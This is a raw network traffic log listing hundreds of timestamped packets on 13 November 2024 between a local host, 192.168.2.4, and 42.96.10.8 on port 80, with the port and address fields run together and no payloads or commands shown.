                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733437061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733448982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733465910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733472109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733499050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733547926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733563900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733578920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733604908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733614922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733633041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733650923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733661890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733678102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733695030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733711004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733720064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733728886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733738899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733747005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733762980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733767033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733781099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733797073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733870029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733886957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733902931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733911037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733918905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733933926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733946085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733949900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733967066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733971119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734013081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734055996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734072924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734095097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734112978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734122038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734139919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734158039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734164000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734177113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734190941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734220028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734237909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734266043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734282017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734297991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734312057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734319925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734328985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734344959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734360933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734360933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734378099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734383106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734406948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734410048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734421015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734436035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734452963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734467030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734483004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734498024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734505892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734514952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734530926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734546900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734555960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734565020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734576941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734601974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734622002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734638929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734654903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734671116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734675884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734725952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734762907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734777927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734793901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734807968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734819889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734823942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734839916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734860897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734886885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734915972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734931946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734946966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734962940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734972000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734980106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.734994888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735002041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735012054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735027075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735033989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735048056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735063076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735079050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735084057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735095024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735105038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735114098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735126972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735132933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735145092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735171080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735191107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735207081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735224009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735244036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735249043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735265970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735265970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735284090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735301018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735301018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735328913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735347986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735390902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735408068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735421896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735443115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735466003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735502958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735517025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735532045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735548973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735555887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735565901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735583067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735590935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735600948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735619068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735634089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735635042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735652924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735656977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735687971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735707045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735827923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735853910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735867023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735871077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735888004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735904932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735919952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735928059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735937119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735948086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735955000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735972881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.735984087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.736006975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785725117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785739899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785820007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785821915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785835981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785852909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785868883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785875082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785896063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785911083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785933018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785933971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785959005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785960913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785978079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.785991907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786000013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786009073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786024094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786026955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786047935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786052942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786066055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786081076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786097050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786103964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786113024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786127090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786139011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786143064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786154985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786173105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.786194086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.816847086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.816863060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.816878080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.816893101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.816899061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.816910028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.816925049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.816926956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.816967010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.825871944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.825958967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.825972080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.825987101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826003075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826009989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826025009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826031923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826041937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826060057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826066971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826072931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826095104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826913118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826929092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826953888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826958895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826970100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826986074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.826992035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.827028036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846127987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846368074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846383095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846398115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846412897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846422911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846427917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846452951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846465111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846466064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846467972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846483946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846493959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846504927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846519947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846525908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846538067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846549034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846553087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846560001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846570015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846596003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846739054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846755028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846771002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846784115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846790075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846807003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846817017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846831083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846868038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.846973896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847017050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847028971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847043991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847058058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847074986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847083092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847115993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847119093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847131968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847168922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847805977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847832918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847847939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847884893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847924948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847940922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847955942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847971916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.847978115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848001003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848077059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848092079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848108053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848123074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848130941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848140001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848149061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848156929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848180056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848185062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848201990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848217010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848227024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848262072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.848325968 CET804973342.96.10.8192.168.2.4
